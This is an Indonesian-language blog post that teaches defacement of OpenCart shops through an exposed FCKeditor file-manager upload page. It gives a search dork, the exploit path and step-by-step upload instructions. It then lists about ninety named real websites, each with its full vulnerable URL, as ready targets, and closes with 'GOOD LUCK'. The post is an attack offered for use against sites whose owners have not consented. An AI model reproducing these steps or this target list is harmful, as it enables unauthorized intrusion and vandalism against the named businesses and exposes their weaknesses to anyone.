Deface Website Powered By Opencart + Site-site Vuln Nya :D

lngsung aja...

dork : Powered By OpenCart site:com

"site:" terserah, yang penting support opencart

ex target: http://www.planespares.com/

bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya
ex: http://www.target.com/patch/

nah kalo dh dpt trget, lngsung aj kita inject exploitnya

for exploit :
Quote:
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


jdi nya gni
ex: http://www.planespares.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

kalo target yang ad /patch/ , inject nya d belakang patch nya
ex:www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

liat yg kluar, dstu trdpat tmpat upload file nya.....
connector pilih PHP
lngsung aja kita upload file html deface kita...
jika berhasil mka akan kluar alert sprti ini
Code:
"file uploaded with no errors"

liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"

skrng liat hasilnya....

ex hasil: http://www.planespares.com/Katonnightmare.html

sayangnya file yang kita upload nggk bisa nimpa file sblm nya, tetapi duplikat file...file(1).html or file(2).html..







Nih Gw Kasi Bnyk Sitesite Vulnnya :D :


Daftar website yang Vulnrable :


  1. http://www.xuhongmrw.com/theanimeshop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  2. http://www.ugsdeportes.com.ar//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  3. http://vinosysaboresdelsol.com.ar/catalogo/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  4. http://www.dacdisenios.com.ar/tienda//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  5. http://www.lubetlenceria.com/ventas/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  6. http://www.ugsdeportes.com.ar/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  7. http://www.dacdisenios.com.ar/tienda/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  8. http://www.store-fourseasons.com/opencart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
  9. http://www.ottimotohk.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html 
  10. http://www.store-fourseasons.com/opencart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
11.  http://www.brooktroutstore.com.hk/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
12.  http://www.karens-shop.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
13.  http://hana-yi.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
14.  http://www.xpalpower.com.tw/opencart//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
15.  http://www.thespaberry.com/store//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
16.  http://www.fresh89.com/swag/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
17.  http://www.connectix.ca/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
18.  http://baliclothingexporter.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
19.  http://www.binksyandbobo.com/shop//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
20.  http://thebestnetbook.net/shop//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
21.  http://livingpraise.org/OpenCart/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
22.  http://www.123alternatives.net/opcart//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
23.  http://leszak.net/opcart//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
24.  http://babytaif.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
25.  http://ciaoservices.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
26.  http://77.93.249.148/upload//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
27.  http://www.mornord.altervista.org/php5//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
28.  http://www.medinatsrl.com/shop//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
29.  http://www.eolowindsurf.com/eolotheshop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
30.  http://www.medinatsrl.com/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
31.  http://www.pestoportofino.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
32.  http://www.friulianproducts.com/Store3//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
33.  http://www.planespares.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
34.  http://www.electronicaymas.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
35.  http://www.ufficio2000.biz/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
36.  http://www.computer-planet.it//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
37.  http://www.prodottimolisani.it/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
38.  http://www.pccommerce.it/shop//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
39.  http://www.electronicaymas.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
40.  http://www.mornord.altervista.org/php5/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
41.  http://www.iostampo.eu/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
42.  http://www.disulmona.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
43.  http://www.nwtech.it/digitime/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
44.  http://www.piscine-atlantis.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
45.  http://www.secret0.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
46.  http://wolfi.it/wolfi/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
47.  http://www.disulmona.com/store/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
48.  http://www.superbikecarbonparts.com//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
49.  http://www.nwtech.it/digitime//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
50.  http://www.assistenzameccanica.it/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
51.  http://www.vendografica.biz/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
52.  http://www.iostampo.eu/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
53.  http://www.oriensanimali.com/public/ec/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
54.  http://vshop.vitagelworld.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
55.  http://plusweb.bedestencarsi.com/opencart//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
56.  http://shop.faye-ligui.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
57.  http://www.biowoman-us.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
58.  http://myselfforward.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
59.  http://citynkr.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
60.  http://www.library-mobile.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
61.  http://thailandcarving.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
62.  http://harddisktohome.in.th/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
63.  http://www.pattayaasset.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
64.  http://myselfforward.com//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
65.  http://harddisktohome.in.th/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
66.  http://www.alwasat4pc.com/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
67.  http://www.e-cigareta.ch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
68.  http://ecommerce.ticinodesign.ch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
69.  http://www.chesspoint.ch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
70.  http://www.windelbaby.ch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
71.  http://www.e-cigareta.ch//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
72.  http://www.mammarosa.com.ec/mmr/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
73.  http://prodrivershop.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
74.  http://www.asripahshop.com/v2//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
75.  http://112.137.163.164/xkl//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
76.  http://morethanwords.my/
77.  http://www.spacetytanium.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
78.  http://www.avocadogenie.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
79.  http://www.bestonlinediscounts.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
80.  http://eesnet.org/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
81.  http://hobby-fillately.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
82.  http://www.granmasantiques.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
83.  http://zhongvua.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
84.  http://mcgearusa.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
85.  http://utahflowers.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
86.  http://amourcristallis.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
87.  http://wiretek.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
88.  http://www.shotgunstock.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
89.  http://www.justhouda.com/oc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
90.  http://virtualgeorge.info/132test/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
91.  http://volomilano.altervista.org/upload//admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html



. GOOD LUCK :D

Postingan terkait:

Belum ada tanggapan untuk "Deface Website Powered By Opencart + Site-site Vuln Nya :D"

Posting Komentar

> Jika Artikel ini Membantu , Silahkan tinggalkan Komentar Anda
> Jika ingin menuliskan Kode-kode blog , jangan sekali-kali menulisnya dengan lengkap , Karena kodenya tidak akan muncul.
> U Comment I Follow !!!
> (Comment Use Emoticons, Copy Paste this code example: 13 or the other to the column comments)
> "No Spam"
> Do not Forget Leave Your Comment Here ...
> I Highly Appreciate your comment. This blog has been Dofollow.
> Komentar yang masuk SPAM tidak saya hapus dan saya akan Follow (jika link ada)

Follow Blog ini jika ingin mendapatkan informasi paling update